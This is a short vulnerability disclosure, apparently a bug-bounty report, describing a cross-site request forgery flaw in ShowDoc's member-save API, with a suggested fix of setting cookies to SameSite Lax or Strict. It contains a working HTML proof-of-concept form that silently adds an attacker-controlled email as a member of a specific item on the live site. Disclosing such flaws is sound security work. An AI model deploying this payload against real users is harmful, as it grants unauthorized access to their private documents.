With CSRF vulnerability Attacker able to add any member to for any item if users visit attacker site.
1.Open the PoC.html In Firefox or safari.
2.now you can check that member with email address [email protected]
that already should registered befor have access to item with id 1531601670203340
.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
<input type="hidden" name="item_id" value="1531601670203340" />
<input type="hidden" name="username" value="evil@mail.com" />
<input type="hidden" name="cat_id" value="0" />
<input type="hidden" name="member_group_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
This vulnerability is capable of reveal any item.
Set SameSite attribute of cookies to Lax
or Strict
.